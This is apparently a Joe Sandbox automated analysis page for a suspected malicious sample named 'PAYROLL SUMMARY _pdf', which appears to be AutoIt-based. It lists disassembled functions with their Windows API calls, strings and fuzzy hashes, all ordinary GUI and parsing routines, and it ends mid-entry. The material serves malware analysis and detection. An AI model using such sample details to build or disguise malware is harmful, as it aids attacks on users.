Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 76e9d560ec7dadf3cd93e82550c62ebe2dc471330636965869a9954b599579ae
Instruction ID: 939a0301ae61c8e5c74dcb1a965dc5255774edf62add61f52cb662967b672239
Opcode Fuzzy Hash: 76e9d560ec7dadf3cd93e82550c62ebe2dc471330636965869a9954b599579ae
Instruction Fuzzy Hash: E25109306B5705DBCB02EF58D9629FD73B0AB187C17208415E54EA72D0C7F59D66CB42

Function 00256A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00256A91
__wcsnicmp.LIBCMT ref: 00256AA9
__wcsnicmp.LIBCMT ref: 00256AC1
__wcsnicmp.LIBCMT ref: 00256AD9
__wcsnicmp.LIBCMT ref: 00256AF1
__wcsnicmp.LIBCMT ref: 00256B09
__wcsnicmp.LIBCMT ref: 00256B21
__wcsnicmp.LIBCMT ref: 00256B35
__wcsnicmp.LIBCMT ref: 00256B76
__wcsnicmp.LIBCMT ref: 00256B8A
__wcsnicmp.LIBCMT ref: 00256B9E
__wcsnicmp.LIBCMT ref: 00256BB2

Strings

#comments-end, xrefs: 00256B98
#include, xrefs: 00256B03
#notrayicon, xrefs: 00256AA3
#cs, xrefs: 00256B2F, 00256B84
#requireadmin, xrefs: 00256ABB
#comments-start, xrefs: 00256B1B, 00256B70
Cannot parse #include, xrefs: 0028E819
Unterminated group of comments, xrefs: 0028E82C
#include-once, xrefs: 00256AEB
#pragma compile, xrefs: 00256A8B
#ce, xrefs: 00256BAC
#OnAutoItStartRegister, xrefs: 00256AD3
Bad directive syntax error, xrefs: 0028E743

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 5fdf553a3f7bd99bed980d740d8a496bc778d1311d7e637e8477b3fdabffcebb
Instruction ID: a8cb855ca3c5e35ebc120dea8fd56e2deef76d2a9262d5c0631b39a11cbd496b
Opcode Fuzzy Hash: 5fdf553a3f7bd99bed980d740d8a496bc778d1311d7e637e8477b3fdabffcebb
Instruction Fuzzy Hash: 2B812770670316AACF21BE20CD87FAE7768AF15305F448021FD45AB1C2EB70DA79CA59

Function 002DAB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 002DAB99
SetTextColor.GDI32(?,?), ref: 002DAB9D
GetSysColorBrush.USER32(0000000F), ref: 002DABB3
GetSysColor.USER32(0000000F), ref: 002DABBE
CreateSolidBrush.GDI32(?), ref: 002DABC3
GetSysColor.USER32(00000011), ref: 002DABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 002DABE9
SelectObject.GDI32(?,00000000), ref: 002DABFA
SetBkColor.GDI32(?,00000000), ref: 002DAC03
SelectObject.GDI32(?,?), ref: 002DAC10
InflateRect.USER32(?,000000FF,000000FF), ref: 002DAC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002DAC46
GetWindowLongW.USER32(00000000,000000F0), ref: 002DAC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002DACA7
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 002DACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 002DACEC
DrawFocusRect.USER32(?,?), ref: 002DACF7
GetSysColor.USER32(00000011), ref: 002DAD05
SetTextColor.GDI32(?,00000000), ref: 002DAD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 002DAD21
SelectObject.GDI32(?,002DA869), ref: 002DAD38
DeleteObject.GDI32(?), ref: 002DAD43
SelectObject.GDI32(?,?), ref: 002DAD49
DeleteObject.GDI32(?), ref: 002DAD4E
SetTextColor.GDI32(?,?), ref: 002DAD54
SetBkColor.GDI32(?,?), ref: 002DAD5E

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: bed9fbee95bf4b65d32e5999d7e1a8b0a1f663ac96c479535c3869b3494129b7
Instruction ID: 620eaaa2198cd99850f000175c50a76e241787addeb673566d374fa7ff8c9c48
Opcode Fuzzy Hash: bed9fbee95bf4b65d32e5999d7e1a8b0a1f663ac96c479535c3869b3494129b7
Instruction Fuzzy Hash: 84617D71D11219AFDB109FA4ED48EAE7BB9EB08320F148127F916AB2A1D6719D50CF90

Function 002D8C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 002D8D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002D8D45
CharNextW.USER32(0000014E), ref: 002D8D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 002D8DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 002D8DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002D8DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 002D8DF9
SetWindowTextW.USER32(?,0000014E), ref: 002D8E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 002D8E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 002D8E8C
_memset.LIBCMT ref: 002D8EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 002D8EFA
_memset.LIBCMT ref: 002D8F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 002D8F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 002D8FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 002D9088
InvalidateRect.USER32(?,00000000,00000001), ref: 002D90AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002D90F4
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002D9121
DrawMenuBar.USER32(?), ref: 002D9130
SetWindowTextW.USER32(?,0000014E), ref: 002D9158

Strings

0, xrefs: 002D90C2

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 3c710529502a707493dbafd1d72b044f154cc3016678ad476bc38e4197214077
Instruction ID: f48c4b35c453639c02dcd1b907061e28a9c7794f3f4163a1de93ae1a298e8d53
Opcode Fuzzy Hash: 3c710529502a707493dbafd1d72b044f154cc3016678ad476bc38e4197214077
Instruction Fuzzy Hash: 73E17F7092120AABDF219F60DC88EEE7B79EF05710F108157F9199A2D0DB709E95DF60

Function 002D4B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 002D4C51
GetDesktopWindow.USER32 ref: 002D4C66
GetWindowRect.USER32(00000000), ref: 002D4C6D
GetWindowLongW.USER32(?,000000F0), ref: 002D4CCF
DestroyWindow.USER32(?), ref: 002D4CFB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002D4D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002D4D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 002D4D68
SendMessageW.USER32(?,00000421,?,?), ref: 002D4D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 002D4D90
IsWindowVisible.USER32(?), ref: 002D4DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 002D4DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 002D4DDF
GetWindowRect.USER32(?,?), ref: 002D4DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 002D4E1D
GetMonitorInfoW.USER32(00000000,?), ref: 002D4E37
CopyRect.USER32(?,?), ref: 002D4E4E
SendMessageW.USER32(?,00000412,00000000), ref: 002D4EB9

Strings

tooltips_class32, xrefs: 002D4D1D
(, xrefs: 002D4E2A
0, xrefs: 002D4BFC

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 0d0b0dc7c38555d080de5f1460e718f694545b2434406f32bef9357f8292f212
Instruction ID: 2c03ccd0db0624c6cfe6c16a14c51cd1dc7c00b5e7d4770420d82447d3edc124
Opcode Fuzzy Hash: 0d0b0dc7c38555d080de5f1460e718f694545b2434406f32bef9357f8292f212
Instruction Fuzzy Hash: 54B1AC70628341AFDB44EF24C949B5ABBE4FF88300F00891EF9999B2A1D770EC54CB95

Function 002B46D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 002B46E8
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 002B470E
_wcscpy.LIBCMT ref: 002B473C
_wcscmp.LIBCMT ref: 002B4747
_wcscat.LIBCMT ref: 002B475D
_wcsstr.LIBCMT ref: 002B4768
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 002B4784
_wcscat.LIBCMT ref: 002B47CD
_wcscat.LIBCMT ref: 002B47D4
_wcsncpy.LIBCMT ref: 002B47FF

Strings

StringFileInfo\, xrefs: 002B4757
DefaultLangCodepage, xrefs: 002B47E7
04090000, xrefs: 002B47BA
\VarFileInfo\Translation, xrefs: 002B477C
%u.%u.%u.%u, xrefs: 002B4862

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 0830bfefad3a0d1d4d0bc02e03adfa1f322faa588d5b60df3336907843cbc57a
Instruction ID: ccbd87e6cda5adcf9113e6af8aaa76bf465766e96b551896ac3e889cede31cd1
Opcode Fuzzy Hash: 0830bfefad3a0d1d4d0bc02e03adfa1f322faa588d5b60df3336907843cbc57a
Instruction Fuzzy Hash: 3E412A31920211BAD711BB649C47EFF777CDF02750F044066F909A6183EB70A9209AA5

Function 002527D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002528BC
GetSystemMetrics.USER32(00000007), ref: 002528C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002528EF
GetSystemMetrics.USER32(00000008), ref: 002528F7
GetSystemMetrics.USER32(00000004), ref: 0025291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00252939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00252949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0025297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00252990
GetClientRect.USER32(00000000,000000FF), ref: 002529AE
GetStockObject.GDI32(00000011), ref: 002529CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 002529D5

Part of subcall function 00252344: GetCursorPos.USER32(?), ref: 00252357
Part of subcall function 00252344: ScreenToClient.USER32(003167B0,?), ref: 00252374
Part of subcall function 00252344: GetAsyncKeyState.USER32(00000001), ref: 00252399
Part of subcall function 00252344: GetAsyncKeyState.USER32(00000002), ref: 002523A7

SetTimer.USER32(00000000,00000000,00000028,00251256), ref: 002529FC

Strings

AutoIt v3 GUI, xrefs: 00252974

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: ee430e016bd58e3d3b17bb74a799a70ed2503e935d229b7dc31d8c1584bf6be9
Instruction ID: a7202162fca2ed77e2ee0c8d5db92fc34a362e9fa384639bf6c68f96091ac3f8
Opcode Fuzzy Hash: ee430e016bd58e3d3b17bb74a799a70ed2503e935d229b7dc31d8c1584bf6be9
Instruction Fuzzy Hash: 89B19D34A1120AEFDB15DFA8DD49BED7BA4FB08311F108129FA16A62D0CB70D865CB64

Function 002D4069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002D40F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002D41B6

Strings

SELECT, xrefs: 002D4250
GETTEXT, xrefs: 002D415F
GETSELECTED, xrefs: 002D42E4
SELECTINVERT, xrefs: 002D4286
VIEWCHANGE, xrefs: 002D4375
GETITEMCOUNT, xrefs: 002D4128
ISSELECTED, xrefs: 002D41C1
GETSELECTEDCOUNT, xrefs: 002D4199
SELECTCLEAR, xrefs: 002D4235
DESELECT, xrefs: 002D42A4
FINDITEM, xrefs: 002D4329
SELECTALL, xrefs: 002D421D
GETSUBITEMCOUNT, xrefs: 002D4141

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: b1f3542e8b1c2cd0c68a8190a6f40bae479744a781e518fba3ac8205a1b5d449
Instruction ID: b7771f76927a3f284a298df860582abf9a992b4e599e937c201f6e6363ed8413
Opcode Fuzzy Hash: b1f3542e8b1c2cd0c68a8190a6f40bae479744a781e518fba3ac8205a1b5d449
Instruction Fuzzy Hash: BFA1A130234301DFCB14FF14C951A6AB3A5AF45314F14886AB89A5B7D2DB30ED69CF51

Function 002C52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 002C5309
LoadCursorW.USER32(00000000,00007F8A), ref: 002C5314
LoadCursorW.USER32(00000000,00007F00), ref: 002C531F
LoadCursorW.USER32(00000000,00007F03), ref: 002C532A
LoadCursorW.USER32(00000000,00007F8B), ref: 002C5335
LoadCursorW.USER32(00000000,00007F01), ref: 002C5340
LoadCursorW.USER32(00000000,00007F81), ref: 002C534B
LoadCursorW.USER32(00000000,00007F88), ref: 002C5356
LoadCursorW.USER32(00000000,00007F80), ref: 002C5361
LoadCursorW.USER32(00000000,00007F86), ref: 002C536C
LoadCursorW.USER32(00000000,00007F83), ref: 002C5377
LoadCursorW.USER32(00000000,00007F85), ref: 002C5382
LoadCursorW.USER32(00000000,00007F82), ref: 002C538D
LoadCursorW.USER32(00000000,00007F84), ref: 002C5398
LoadCursorW.USER32(00000000,00007F04), ref: 002C53A3
LoadCursorW.USER32(00000000,00007F02), ref: 002C53AE
GetCursorInfo.USER32(?), ref: 002C53BE
GetLastError.KERNEL32(00000001,00000000), ref: 002C53E9

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 8bab174778084916be153dc87273d75639729e920e3432c52ffc73ab3e79ef51
Instruction ID: 872f3c04365d57e550a015ef99d909f50f444eb0b0b34fbf5d51132f603060e7
Opcode Fuzzy Hash: 8bab174778084916be153dc87273d75639729e920e3432c52ffc73ab3e79ef51
Instruction Fuzzy Hash: 64418670E143296ADB209FB68C49D6FFFF8EF51B10B10452FE509E7290DAB8A440CE61

Function 002AAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 002AAAA5
__swprintf.LIBCMT ref: 002AAB46
_wcscmp.LIBCMT ref: 002AAB59
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 002AABAE
_wcscmp.LIBCMT ref: 002AABEA
GetClassNameW.USER32(?,?,00000400), ref: 002AAC21
GetDlgCtrlID.USER32(?), ref: 002AAC73
GetWindowRect.USER32(?,?), ref: 002AACA9
GetParent.USER32(?), ref: 002AACC7
ScreenToClient.USER32(00000000), ref: 002AACCE
GetClassNameW.USER32(?,?,00000100), ref: 002AAD48
_wcscmp.LIBCMT ref: 002AAD5C
GetWindowTextW.USER32(?,?,00000400), ref: 002AAD82
_wcscmp.LIBCMT ref: 002AAD96

Part of subcall function 0027386C: _iswctype.LIBCMT ref: 00273874

Strings

%s%u, xrefs: 002AAB40

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 8922c9505cdd2c259aa25649f565dcd0ca34845d1e0dc63ae2a073ef9ef6d441
Instruction ID: 709b0ffd3a182539823258072041fc32beae4d13eb37065ba15dad87471b942c
Opcode Fuzzy Hash: 8922c9505cdd2c259aa25649f565dcd0ca34845d1e0dc63ae2a073ef9ef6d441
Instruction Fuzzy Hash: 95A1C071224707AFD714DF24C884BEAF7E8FF06315F00862AF99982591DB30E965CB92

Function 002AB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 002AB3DB
_wcscmp.LIBCMT ref: 002AB3EC
GetWindowTextW.USER32(00000001,?,00000400), ref: 002AB414
CharUpperBuffW.USER32(?,00000000), ref: 002AB431
_wcscmp.LIBCMT ref: 002AB44F
_wcsstr.LIBCMT ref: 002AB460
GetClassNameW.USER32(00000018,?,00000400), ref: 002AB498
_wcscmp.LIBCMT ref: 002AB4A8
GetWindowTextW.USER32(00000002,?,00000400), ref: 002AB4CF
GetClassNameW.USER32(00000018,?,00000400), ref: 002AB518
_wcscmp.LIBCMT ref: 002AB528
GetClassNameW.USER32(00000010,?,00000400), ref: 002AB550
GetWindowRect.USER32(00000004,?), ref: 002AB5B9

Strings

@, xrefs: 002AB3BC
ThumbnailClass, xrefs: 002AB4A3, 002AB523

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: db1bbd941c60dc696c3dcb275c8588bbbfd55404758e41c0a3855f2d304d3d5f
Instruction ID: 544d62f71628ef0428d371c0c8617392af5ace66f9c30e6777c8ed97aef9af19
Opcode Fuzzy Hash: db1bbd941c60dc696c3dcb275c8588bbbfd55404758e41c0a3855f2d304d3d5f
Instruction Fuzzy Hash: 7D81C0714243069BDB06DF10D885FAABBE8EF45714F0481AAFD898A093DF30DD69CB61

Function 002DC8EE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623

DragQueryPoint.SHELL32(?,?), ref: 002DC917

Part of subcall function 002DADF1: ClientToScreen.USER32(?,?), ref: 002DAE1A
Part of subcall function 002DADF1: GetWindowRect.USER32(?,?), ref: 002DAE90
Part of subcall function 002DADF1: PtInRect.USER32(?,?,002DC304), ref: 002DAEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 002DC980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002DC98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002DC9AE
_wcscat.LIBCMT ref: 002DC9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 002DC9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 002DCA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 002DCA25
SendMessageW.USER32(?,000000B1,?,?), ref: 002DCA47
DragFinish.SHELL32(?), ref: 002DCA4E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 002DCB41

Strings

@GUI_DRAGFILE, xrefs: 002DCAF0
@GUI_DRAGID, xrefs: 002DCAB9
pr1, xrefs: 002DCA8B
@GUI_DROPID, xrefs: 002DCA6E

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pr1
API String ID: 169749273-2184659058
Opcode ID: bc9aebf6ca392fc2c9bb752292714cc3e61098c84ab79af0d9791d512e2430d6
Instruction ID: e30d828521bbfa72c727a3f4d5bbd1929c0a79919d377793023a72f9f02c16d5
Opcode Fuzzy Hash: bc9aebf6ca392fc2c9bb752292714cc3e61098c84ab79af0d9791d512e2430d6
Instruction Fuzzy Hash: C7617B71518301AFC701DF64DC89D9FBBE8EF88710F104A2EF992922A1DB709A59CF56

Function 002AB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

